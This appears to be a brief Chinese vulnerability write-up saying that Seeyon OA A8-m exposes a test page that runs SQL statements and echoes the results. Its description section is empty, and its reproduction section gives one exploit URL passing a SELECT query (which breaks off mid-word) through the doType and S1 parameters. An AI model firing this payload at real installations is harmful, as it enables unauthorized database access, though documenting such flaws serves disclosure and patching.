致远OA A8-m 存在sql语句页面回显功能

一、漏洞简介

二、漏洞影响

致远OA A8-m

三、复现过程

http://wwww.0-sec.org/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20@@datadi